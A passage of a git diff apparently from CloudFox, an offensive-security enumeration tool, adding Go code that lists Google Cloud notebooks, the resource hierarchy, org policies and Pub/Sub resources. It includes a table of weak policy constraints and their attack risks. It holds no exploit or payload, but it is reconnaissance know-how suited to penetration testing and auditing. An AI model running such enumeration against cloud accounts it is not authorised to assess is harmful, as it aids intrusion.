func(page *notebooks.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + return instances, nil +} + +// ListRuntimes retrieves all managed notebook runtimes +func (s *NotebooksService) ListRuntimes(projectID string) ([]RuntimeInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + var runtimes []RuntimeInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Runtimes.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListRuntimesResponse) error { + for _, runtime := range page.Runtimes { + info := s.parseRuntime(runtime, projectID) + runtimes = append(runtimes, info) + } + return nil + }) + if err != nil { + // Runtimes API might not be available in all regions + return runtimes, nil + } + + return runtimes, nil +} + +func (s *NotebooksService) parseInstance(instance *notebooks.Instance, projectID string) NotebookInstanceInfo { + info := NotebookInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + State: instance.State, + MachineType: extractName(instance.MachineType), + CreateTime: instance.CreateTime, + UpdateTime: instance.UpdateTime, + } + + // Service account + info.ServiceAccount = instance.ServiceAccount + + // Network config + info.Network = extractName(instance.Network) + info.Subnet = extractName(instance.Subnet) + info.NoPublicIP = instance.NoPublicIp + info.NoProxyAccess = instance.NoProxyAccess + + // Proxy URI and Creator + info.ProxyUri = instance.ProxyUri + info.Creator = instance.Creator + + // Boot disk + info.BootDiskType = instance.BootDiskType + info.BootDiskSizeGB = instance.BootDiskSizeGb + + // Data disk + info.DataDiskType = instance.DataDiskType + info.DataDiskSizeGB = instance.DataDiskSizeGb + + // GPU config + if instance.AcceleratorConfig != nil { + info.AcceleratorType = instance.AcceleratorConfig.Type + info.AcceleratorCount = instance.AcceleratorConfig.CoreCount + } + info.InstallGpuDriver = instance.InstallGpuDriver + + // Custom container + if instance.ContainerImage != nil { + info.CustomContainer = true + } + + return info +} + +func (s *NotebooksService) parseRuntime(runtime *notebooks.Runtime, projectID string) RuntimeInfo { + info := RuntimeInfo{ + Name: extractName(runtime.Name), + ProjectID: projectID, + Location: extractLocation(runtime.Name), + State: runtime.State, + } + + if runtime.VirtualMachine != nil { + info.RuntimeType = "VirtualMachine" + if runtime.VirtualMachine.VirtualMachineConfig != nil { + config := runtime.VirtualMachine.VirtualMachineConfig + info.MachineType = config.MachineType + info.Network = extractName(config.Network) + info.Subnet = extractName(config.Subnet) + } + } + + if runtime.AccessConfig != nil { + info.ServiceAccount = runtime.AccessConfig.RuntimeOwner + } + + return info +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/oauthService/oauthService.go b/gcp/services/oauthService/oauthService.go index 3f9fa5e7..46dab287 100644 --- a/gcp/services/oauthService/oauthService.go +++ b/gcp/services/oauthService/oauthService.go @@ -48,7 +48,7 @@ func (s *OAuthService) WhoAmI() (*Principal, error) { tokenInfo, err := queryTokenInfo(token.AccessToken) if err != nil { - return nil, fmt.Errorf(fmt.Sprintf("failed to retrieve metada of the token with error: %s", err.Error())) + return nil, fmt.Errorf("failed to retrieve metadata of the token with error: %w", err) } // Split the scope string into a slice of strings. scopes := strings.Split(tokenInfo.Scope, " ") diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go new file mode 100755 index 00000000..384e4fd2 --- /dev/null +++ b/gcp/services/organizationsService/organizationsService.go @@ -0,0 +1,581 @@ +package organizationsservice + +import ( + "context" + "fmt" + "strings" + + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/iterator" +) + +type OrganizationsService struct { + session *gcpinternal.SafeSession +} + +// New creates a new OrganizationsService +func New() *OrganizationsService { + return &OrganizationsService{} +} + +// NewWithSession creates an OrganizationsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *OrganizationsService { + return &OrganizationsService{session: session} +} + +// OrganizationInfo represents organization details +type OrganizationInfo struct { + Name string `json:"name"` // organizations/ORGANIZATION_ID + DisplayName string `json:"displayName"` + DirectoryID string `json:"directoryId"` // Cloud Identity directory ID + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// FolderInfo represents folder details +type FolderInfo struct { + Name string `json:"name"` // folders/FOLDER_ID + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// ProjectInfo represents project details +type ProjectInfo struct { + Name string `json:"name"` // projects/PROJECT_ID + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + Labels map[string]string `json:"labels"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// HierarchyNode represents a node in the resource hierarchy +type HierarchyNode struct { + Type string `json:"type"` // organization, folder, project + ID string `json:"id"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` + Children []HierarchyNode `json:"children"` + Depth int `json:"depth"` +} + +// SearchOrganizations searches for organizations accessible to the caller +func (s *OrganizationsService) SearchOrganizations() ([]OrganizationInfo, error) { + ctx := context.Background() + var client *resourcemanager.OrganizationsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var orgs []OrganizationInfo + + req := &resourcemanagerpb.SearchOrganizationsRequest{} + it := client.SearchOrganizations(ctx, req) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + orgInfo := OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.GetDirectoryCustomerId(), + State: org.State.String(), + } + if org.CreateTime != nil { + orgInfo.CreateTime = org.CreateTime.AsTime().String() + } + if org.UpdateTime != nil { + orgInfo.UpdateTime = org.UpdateTime.AsTime().String() + } + if org.DeleteTime != nil { + orgInfo.DeleteTime = org.DeleteTime.AsTime().String() + } + + orgs = append(orgs, orgInfo) + } + + return orgs, nil +} + +// SearchFolders searches for folders under a given parent +func (s *OrganizationsService) SearchFolders(parent string) ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var folders []FolderInfo + + // Search for folders under the given parent + query := fmt.Sprintf("parent=%s", parent) + req := &resourcemanagerpb.SearchFoldersRequest{ + Query: query, + } + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchAllFolders searches for all accessible folders +func (s *OrganizationsService) SearchAllFolders() ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var folders []FolderInfo + + req := &resourcemanagerpb.SearchFoldersRequest{} + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchProjects searches for projects +func (s *OrganizationsService) SearchProjects(parent string) ([]ProjectInfo, error) { + ctx := context.Background() + var client *resourcemanager.ProjectsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var projects []ProjectInfo + + query := "" + if parent != "" { + query = fmt.Sprintf("parent=%s", parent) + } + req := &resourcemanagerpb.SearchProjectsRequest{ + Query: query, + } + it := client.SearchProjects(ctx, req) + for { + project, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + projectInfo := ProjectInfo{ + Name: project.Name, + ProjectID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State.String(), + Labels: project.Labels, + } + if project.CreateTime != nil { + projectInfo.CreateTime = project.CreateTime.AsTime().String() + } + if project.UpdateTime != nil { + projectInfo.UpdateTime = project.UpdateTime.AsTime().String() + } + if project.DeleteTime != nil { + projectInfo.DeleteTime = project.DeleteTime.AsTime().String() + } + + projects = append(projects, projectInfo) + } + + return projects, nil +} + +// GetProjectAncestry returns the ancestry path from project to organization +func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]HierarchyNode, error) { + ctx := context.Background() + + var projectsClient *resourcemanager.ProjectsClient + var foldersClient *resourcemanager.FoldersClient + var orgsClient *resourcemanager.OrganizationsClient + var err error + + if s.session != nil { + projectsClient, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + projectsClient, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer projectsClient.Close() + + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + + var ancestry []HierarchyNode + resourceID := "projects/" + projectID + + // Track inaccessible folder IDs so we can try to find org via search + var inaccessibleFolderID string + + for { + if strings.HasPrefix(resourceID, "organizations/") { + orgID := strings.TrimPrefix(resourceID, "organizations/") + displayName := orgID // Default to numeric ID if we can't get display name + + // Try to get the org's display name + org, err := orgsClient.GetOrganization(ctx, &resourcemanagerpb.GetOrganizationRequest{Name: resourceID}) + if err == nil && org.DisplayName != "" { + displayName = org.DisplayName + } + + ancestry = append(ancestry, HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: displayName, + }) + break + } else if strings.HasPrefix(resourceID, "folders/") { + folder, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) + if err != nil { + // Permission denied on folder - skip this folder and try to find the org + // Don't add the inaccessible folder to ancestry, just try to find the org + inaccessibleFolderID = strings.TrimPrefix(resourceID, "folders/") + + // Try to find the org by searching accessible orgs + orgsIter := orgsClient.SearchOrganizations(ctx, &resourcemanagerpb.SearchOrganizationsRequest{}) + for { + org, iterErr := orgsIter.Next() + if iterErr == iterator.Done { + break + } + if iterErr != nil { + break + } + // Add the first accessible org (best effort) + // The project likely belongs to one of the user's accessible orgs + orgID := strings.TrimPrefix(org.Name, "organizations/") + ancestry = append(ancestry, HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: org.DisplayName, + }) + break + } + break + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + ancestry = append(ancestry, HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + }) + resourceID = folder.Parent + } else if strings.HasPrefix(resourceID, "projects/") { + project, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) + if err != nil { + break + } + ancestry = append(ancestry, HierarchyNode{ + Type: "project", + ID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + }) + resourceID = project.Parent + } else { + break + } + } + + // Suppress unused variable warning + _ = inaccessibleFolderID + + // Reverse to go from organization to project + for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { + ancestry[i], ancestry[j] = ancestry[j], ancestry[i] + } + + // Set depth + for i := range ancestry { + ancestry[i].Depth = i + } + + return ancestry, nil +} + +// GetOrganizationIDFromProject returns the organization ID for a given project +// by walking up the resource hierarchy until it finds an organization +func (s *OrganizationsService) GetOrganizationIDFromProject(projectID string) (string, error) { + ancestry, err := s.GetProjectAncestry(projectID) + if err != nil { + return "", err + } + + for _, node := range ancestry { + if node.Type == "organization" { + return node.ID, nil + } + } + + return "", fmt.Errorf("no organization found in ancestry for project %s", projectID) +} + +// ------------------------------ +// HierarchyDataProvider Implementation +// ------------------------------ + +// GetProjectAncestryForHierarchy returns ancestry in the format needed by BuildScopeHierarchy +func (s *OrganizationsService) GetProjectAncestryForHierarchy(projectID string) ([]gcpinternal.AncestryNode, error) { + ancestry, err := s.GetProjectAncestry(projectID) + if err != nil { + return nil, err + } + + result := make([]gcpinternal.AncestryNode, len(ancestry)) + for i, node := range ancestry { + result[i] = gcpinternal.AncestryNode{ + Type: node.Type, + ID: node.ID, + DisplayName: node.DisplayName, + Parent: node.Parent, + Depth: node.Depth, + } + } + return result, nil +} + +// SearchOrganizationsForHierarchy returns orgs in the format needed by BuildScopeHierarchy +func (s *OrganizationsService) SearchOrganizationsForHierarchy() ([]gcpinternal.OrganizationData, error) { + orgs, err := s.SearchOrganizations() + if err != nil { + return nil, err + } + + result := make([]gcpinternal.OrganizationData, len(orgs)) + for i, org := range orgs { + result[i] = gcpinternal.OrganizationData{ + Name: org.Name, + DisplayName: org.DisplayName, + } + } + return result, nil +} + +// HierarchyProvider wraps OrganizationsService to implement HierarchyDataProvider +type HierarchyProvider struct { + svc *OrganizationsService +} + +// NewHierarchyProvider creates a HierarchyProvider from an OrganizationsService +func NewHierarchyProvider(svc *OrganizationsService) *HierarchyProvider { + return &HierarchyProvider{svc: svc} +} + +// GetProjectAncestry implements HierarchyDataProvider +func (p *HierarchyProvider) GetProjectAncestry(projectID string) ([]gcpinternal.AncestryNode, error) { + return p.svc.GetProjectAncestryForHierarchy(projectID) +} + +// SearchOrganizations implements HierarchyDataProvider +func (p *HierarchyProvider) SearchOrganizations() ([]gcpinternal.OrganizationData, error) { + return p.svc.SearchOrganizationsForHierarchy() +} + +// BuildHierarchy builds a complete hierarchy tree +func (s *OrganizationsService) BuildHierarchy() ([]HierarchyNode, error) { + // Get organizations + orgs, err := s.SearchOrganizations() + if err != nil { + return nil, err + } + + var roots []HierarchyNode + + for _, org := range orgs { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNode := HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: org.DisplayName, + Depth: 0, + Children: []HierarchyNode{}, + } + + // Get folders under this org + s.buildFolderTree(&orgNode, org.Name, 1) + + // Get projects directly under org + projects, err := s.SearchProjects(org.Name) + if err == nil { + for _, proj := range projects { + projNode := HierarchyNode{ + Type: "project", + ID: proj.ProjectID, + DisplayName: proj.DisplayName, + Parent: proj.Parent, + Depth: 1, + } + orgNode.Children = append(orgNode.Children, projNode) + } + } + + roots = append(roots, orgNode) + } + + return roots, nil +} + +// buildFolderTree recursively builds folder tree +func (s *OrganizationsService) buildFolderTree(parent *HierarchyNode, parentName string, depth int) { + folders, err := s.SearchFolders(parentName) + if err != nil { + return + } + + for _, folder := range folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNode := HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + Depth: depth, + Children: []HierarchyNode{}, + } + + // Recursively get child folders + s.buildFolderTree(&folderNode, folder.Name, depth+1) + + // Get projects under this folder + projects, err := s.SearchProjects(folder.Name) + if err == nil { + for _, proj := range projects { + projNode := HierarchyNode{ + Type: "project", + ID: proj.ProjectID, + DisplayName: proj.DisplayName, + Parent: proj.Parent, + Depth: depth + 1, + } + folderNode.Children = append(folderNode.Children, projNode) + } + } + + parent.Children = append(parent.Children, folderNode) + } +} diff --git a/gcp/services/orgpolicyService/orgpolicyService.go b/gcp/services/orgpolicyService/orgpolicyService.go new file mode 100644 index 00000000..4fff232c --- /dev/null +++ b/gcp/services/orgpolicyService/orgpolicyService.go @@ -0,0 +1,226 @@ +package orgpolicyservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + "google.golang.org/api/orgpolicy/v2" +) + +type OrgPolicyService struct { + session *gcpinternal.SafeSession +} + +func New() *OrgPolicyService { + return &OrgPolicyService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *OrgPolicyService { + return &OrgPolicyService{session: session} +} + +// getService returns an Org Policy service client using cached session if available +func (s *OrgPolicyService) getService(ctx context.Context) (*orgpolicy.Service, error) { + if s.session != nil { + return sdk.CachedGetOrgPolicyService(ctx, s.session) + } + return orgpolicy.NewService(ctx) +} + +// OrgPolicyInfo represents an organization policy +type OrgPolicyInfo struct { + Name string `json:"name"` + Constraint string `json:"constraint"` + ProjectID string `json:"projectId"` + Enforced bool `json:"enforced"` + AllowAll bool `json:"allowAll"` + DenyAll bool `json:"denyAll"` + AllowedValues []string `json:"allowedValues"` + DeniedValues []string `json:"deniedValues"` + InheritParent bool `json:"inheritFromParent"` + Description string `json:"description"` +} + +// SecurityRelevantConstraints maps constraint names to their security implications +var SecurityRelevantConstraints = map[string]struct { + Description string + RiskWhenWeak string + DefaultSecure bool +}{ + // Domain restriction + "constraints/iam.allowedPolicyMemberDomains": { + Description: "Restricts IAM members to specific domains", + RiskWhenWeak: "Allows external users/accounts to be granted IAM permissions", + DefaultSecure: false, + }, + // Service account key creation + "constraints/iam.disableServiceAccountKeyCreation": { + Description: "Prevents service account key creation", + RiskWhenWeak: "Allows persistent SA key creation for long-term access", + DefaultSecure: false, + }, + "constraints/iam.disableServiceAccountKeyUpload": { + Description: "Prevents uploading service account keys", + RiskWhenWeak: "Allows external keys to be uploaded for SA access", + DefaultSecure: false, + }, + // Workload identity + "constraints/iam.workloadIdentityPoolProviders": { + Description: "Restricts workload identity pool providers", + RiskWhenWeak: "Allows external identity providers to assume GCP identities", + DefaultSecure: false, + }, + "constraints/iam.workloadIdentityPoolAwsAccounts": { + Description: "Restricts AWS accounts for workload identity", + RiskWhenWeak: "Allows any AWS account to assume GCP identity", + DefaultSecure: false, + }, + // Compute restrictions + "constraints/compute.requireShieldedVm": { + Description: "Requires Shielded VMs", + RiskWhenWeak: "Allows VMs without Shielded VM protections", + DefaultSecure: false, + }, + "constraints/compute.requireOsLogin": { + Description: "Requires OS Login for SSH access", + RiskWhenWeak: "Allows metadata-based SSH keys instead of centralized access", + DefaultSecure: false, + }, + "constraints/compute.vmExternalIpAccess": { + Description: "Restricts which VMs can have external IPs", + RiskWhenWeak: "Allows any VM to have an external IP", + DefaultSecure: false, + }, + "constraints/compute.disableSerialPortAccess": { + Description: "Disables serial port access to VMs", + RiskWhenWeak: "Allows serial console access to VMs", + DefaultSecure: false, + }, + "constraints/compute.disableNestedVirtualization": { + Description: "Disables nested virtualization", + RiskWhenWeak: "Allows nested VMs for potential sandbox escape", + DefaultSecure: false, + }, + // Storage restrictions + "constraints/storage.uniformBucketLevelAccess": { + Description: "Requires uniform bucket-level access", + RiskWhenWeak: "Allows ACL-based access which is harder to audit", + DefaultSecure: false, + }, + "constraints/storage.publicAccessPrevention": { + Description: "Prevents public access to storage buckets", + RiskWhenWeak: "Allows public bucket/object access", + DefaultSecure: false, + }, + // SQL restrictions + "constraints/sql.restrictPublicIp": { + Description: "Restricts public IPs on Cloud SQL", + RiskWhenWeak: "Allows Cloud SQL instances with public IPs", + DefaultSecure: false, + }, + "constraints/sql.restrictAuthorizedNetworks": { + Description: "Restricts authorized networks for Cloud SQL", + RiskWhenWeak: "Allows broad network access to Cloud SQL", + DefaultSecure: false, + }, + // GKE restrictions + "constraints/container.restrictPublicEndpoint": { + Description: "Restricts GKE public endpoints", + RiskWhenWeak: "Allows GKE clusters with public API endpoints", + DefaultSecure: false, + }, + // Resource location + "constraints/gcp.resourceLocations": { + Description: "Restricts resource locations/regions", + RiskWhenWeak: "Allows resources in any region (compliance risk)", + DefaultSecure: false, + }, + // Service usage + "constraints/serviceuser.services": { + Description: "Restricts which services can be enabled", + RiskWhenWeak: "Allows any GCP service to be enabled", + DefaultSecure: false, + }, + // VPC + "constraints/compute.restrictSharedVpcSubnetworks": { + Description: "Restricts Shared VPC subnetworks", + RiskWhenWeak: "Allows access to any Shared VPC subnetwork", + DefaultSecure: false, + }, + "constraints/compute.restrictVpnPeerIPs": { + Description: "Restricts VPN peer IPs", + RiskWhenWeak: "Allows VPN tunnels to any peer", + DefaultSecure: false, + }, +} + +// ListProjectPolicies lists all org policies for a project +func (s *OrgPolicyService) ListProjectPolicies(projectID string) ([]OrgPolicyInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") + } + + var policies []OrgPolicyInfo + parent := fmt.Sprintf("projects/%s", projectID) + + err = service.Projects.Policies.List(parent).Pages(ctx, func(resp *orgpolicy.GoogleCloudOrgpolicyV2ListPoliciesResponse) error { + for _, policy := range resp.Policies { + info := s.parsePolicyInfo(policy, projectID) + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") + } + + return policies, nil +} + +func (s *OrgPolicyService) parsePolicyInfo(policy *orgpolicy.GoogleCloudOrgpolicyV2Policy, projectID string) OrgPolicyInfo { + info := OrgPolicyInfo{ + Name: policy.Name, + ProjectID: projectID, + } + + // Extract constraint name from policy name + parts := strings.Split(policy.Name, "/policies/") + if len(parts) > 1 { + info.Constraint = "constraints/" + parts[1] + } + + // Get description from SecurityRelevantConstraints if available + if secInfo, ok := SecurityRelevantConstraints[info.Constraint]; ok { + info.Description = secInfo.Description + } + + // Parse the spec + if policy.Spec != nil { + info.InheritParent = policy.Spec.InheritFromParent + + for _, rule := range policy.Spec.Rules { + if rule == nil { + continue + } + + // In v2 API, these are booleans + info.Enforced = rule.Enforce + info.AllowAll = rule.AllowAll + info.DenyAll = rule.DenyAll + + if rule.Values != nil { + info.AllowedValues = append(info.AllowedValues, rule.Values.AllowedValues...) + info.DeniedValues = append(info.DeniedValues, rule.Values.DeniedValues...) + } + } + } + + return info +} + diff --git a/gcp/services/pubsubService/pubsubService.go b/gcp/services/pubsubService/pubsubService.go new file mode 100644 index 00000000..143ce534 --- /dev/null +++ b/gcp/services/pubsubService/pubsubService.go @@ -0,0 +1,309 @@ +package pubsubservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + pubsub "google.golang.org/api/pubsub/v1" +) + +type PubSubService struct { + session *gcpinternal.SafeSession +} + +func New() *PubSubService { + return &PubSubService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *PubSubService { + return &PubSubService{ + session: session, + } +} + +func (ps *PubSubService) getService(ctx context.Context) (*pubsub.Service, error) { + if ps.session != nil { + return sdk.CachedGetPubSubService(ctx, ps.session) + } + return pubsub.NewService(ctx) +} + +// IAMBinding represents a single IAM role/member binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// TopicInfo holds Pub/Sub topic details with security-relevant information +type TopicInfo struct { + Name string + ProjectID string + KmsKeyName string // Encryption key if set + MessageRetentionDuration string + SchemaSettings string + Labels map[string]string + + // IAM bindings + IAMBindings []IAMBinding + + // Subscriptions count + SubscriptionCount int +} + +// SubscriptionInfo holds Pub/Sub subscription details +type SubscriptionInfo struct { + Name string + ProjectID string + Topic string + TopicProject string // Topic may be in different project + + // Configuration + AckDeadlineSeconds int64 + MessageRetention string + RetainAckedMessages bool + ExpirationPolicy string // TTL + Filter string + + // Push configuration + PushEndpoint string // Empty if pull subscription + PushOIDCAudience string + PushServiceAccount string + + // Dead letter + DeadLetterTopic string + MaxDeliveryAttempts int64 + + // BigQuery export + BigQueryTable string + + // Cloud Storage export + CloudStorageBucket string + + // IAM bindings + IAMBindings []IAMBinding +} + +// Topics retrieves all Pub/Sub topics in a project +func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { + ctx := context.Background() + + service, err := ps.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + var topics []TopicInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Topics.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListTopicsResponse) error { + for _, topic := range page.Topics { + info := parseTopicInfo(topic, projectID) + + // Get subscription count + subCount, _ := ps.getTopicSubscriptionCount(service, topic.Name) + info.SubscriptionCount = subCount + + // Try to get IAM policy + iamPolicy, iamErr := ps.getTopicIAMPolicy(service, topic.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings = parseIAMBindings(iamPolicy) + } + + topics = append(topics, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + return topics, nil +} + +// Subscriptions retrieves all Pub/Sub subscriptions in a project +func (ps *PubSubService) Subscriptions(projectID string) ([]SubscriptionInfo, error) { + ctx := context.Background() + + service, err := ps.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + var subscriptions []SubscriptionInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Subscriptions.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListSubscriptionsResponse) error { + for _, sub := range page.Subscriptions { + info := parseSubscriptionInfo(sub, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := ps.getSubscriptionIAMPolicy(service, sub.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings = parseIAMBindings(iamPolicy) + } + + subscriptions = append(subscriptions, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + return subscriptions, nil +} + +// parseTopicInfo extracts relevant information from a Pub/Sub topic +func parseTopicInfo(topic *pubsub.Topic, projectID string) TopicInfo { + info := TopicInfo{ + Name: extractName(topic.Name), + ProjectID: projectID, + Labels: topic.Labels, + } + + if topic.KmsKeyName != "" { + info.KmsKeyName = topic.KmsKeyName + } + + if topic.MessageRetentionDuration != "" { + info.MessageRetentionDuration = topic.MessageRetentionDuration + } + + if topic.SchemaSettings != nil { + info.SchemaSettings = fmt.Sprintf("%s (%s)", + extractName(topic.SchemaSettings.Schema), + topic.SchemaSettings.Encoding) + } + + return info +} + +// parseSubscriptionInfo extracts relevant information from a Pub/Sub subscription +func parseSubscriptionInfo(sub *pubsub.Subscription, projectID string) SubscriptionInfo { + info := SubscriptionInfo{ + Name: sub.Name, + ProjectID: projectID, + Topic: extractName(sub.Topic), + AckDeadlineSeconds: sub.AckDeadlineSeconds, + RetainAckedMessages: sub.RetainAckedMessages, + Filter: sub.Filter, + } + + // Extract name from full path + info.Name = extractName(sub.Name) + + // Extract topic project (may be different from subscription project) + if strings.Contains(sub.Topic, "/") { + parts := strings.Split(sub.Topic, "/") + if len(parts) >= 2 { + info.TopicProject = parts[1] + } + } + + // Message retention + if sub.MessageRetentionDuration != "" { + info.MessageRetention = sub.MessageRetentionDuration + } + + // Expiration policy + if sub.ExpirationPolicy != nil && sub.ExpirationPolicy.Ttl != "" { + info.ExpirationPolicy = sub.ExpirationPolicy.Ttl + } + + // Push configuration + if sub.PushConfig != nil { + info.PushEndpoint = sub.PushConfig.PushEndpoint + + if sub.PushConfig.OidcToken != nil { + info.PushServiceAccount = sub.PushConfig.OidcToken.ServiceAccountEmail 